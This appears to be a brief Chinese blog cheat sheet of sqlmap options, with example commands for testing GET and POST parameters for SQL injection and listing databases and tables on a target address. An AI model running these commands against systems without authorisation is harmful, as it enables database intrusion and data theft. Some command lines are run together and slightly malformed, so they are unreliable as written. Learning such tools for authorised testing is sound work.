sqlmap的参数
1 | --batch:在所有需要用户输入的部分执行默认操作,无需用户再输入。 |
1 | --dbs:获取所有数据库 |
1 | -D:查询选择某个库 |
get 传参
1 | 例:python sqlmap.py -u "http://192.168.131.19/select.php" --data="id=1" --batch --dbs |
post 传参
-将数包存入一文件中
1 | sqlmap -r [文件路径] -p [指定参数] --dbs |
- 在表单里需要检测的参数后加
*等同与 -p
其它参数
1 | sqlmap.py -u"http:// *"--data="a=b"-p a --level3--random-agent --referer="a" --technique T --dbms=mysql --cookie="cookie"--tables |
评论区
欢迎你留下宝贵的意见